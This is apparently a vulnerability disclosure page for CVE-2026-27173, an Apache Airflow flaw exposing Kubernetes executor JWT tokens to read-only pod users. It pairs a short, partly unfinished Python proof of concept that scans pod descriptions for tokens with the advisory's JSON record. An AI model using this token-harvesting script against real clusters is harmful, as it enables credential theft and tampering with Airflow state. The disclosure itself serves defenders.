CVE-2026-27173

#!/usr/bin/env python3 """ PoC for CVE-2026-27173: Apache Airflow JWT Token Exposure This script demonstrates how a user with read-only access to K8s pods might extract sensitive JWT tokens. """ import subprocess import re def get_pods_in_namespace(namespace): # List all pods in the target namespace (requires read access) cmd = f"kubectl get pods -n {namespace} -o json" result = subprocess.run(cmd, shell=True, capture_output=True, text=True) return result.stdout def inspect_pod_for_jwt(namespace, pod_name): # Describe the pod to check environment variables and mounts cmd = f"kubectl describe pod {pod_name} -n {namespace}" result = subprocess.run(cmd, shell=True, capture_output=True, text=True) output = result.stdout # Simple regex to look for JWT patterns (Bearer token) jwt_pattern = r"ey[A-Za-z0-9-_=]+\.[A-Za-z0-9-_=]+\.?[A-Za-z0-9-_.+/=]*" tokens = re.findall(jwt_pattern, output) if tokens: print(f"[+] Found potential JWT in pod {pod_name}:") for token in tokens: print(f"Token: {token[:50]}...") else: print(f"[-] No JWT found in description of {pod_name}") if __name__ == "__main__": target_namespace = "airflow" print(f"[*] Scanning namespace: {target_namespace}") print("[!] Attempting to list pods (requires kubectl configured and read permissions)") # In a real scenario, parse JSON output to get pod names # and loop through them calling inspect_pod_for_jwt print("[!] If pods are accessible, check 'env' and 'volumes' sections for tokens.")

{"cve": {"id": "CVE-2026-27173", "sourceIdentifier": "[email protected]", "published": "2026-05-19T20:16:17.440", "lastModified": "2026-05-19T21:16:41.920", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "JWT tokens that were used by workers in Kubernetes Executors have been exposed to users who had read only access to Kuberentes Pods. This could allow users with just read-only access to perform actions that were only available to running tasks via Task SDK and potentially allow to modify state of Airflow Database for tasks."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-538"}]}], "references": [{"url": "https://github.com/apache/airflow/pull/60108", "source": "[email protected]"}, {"url": "https://lists.apache.org/thread/pk3m2z4s2rkmc0v6gh9hnch9spc6stqw", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/19/35", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}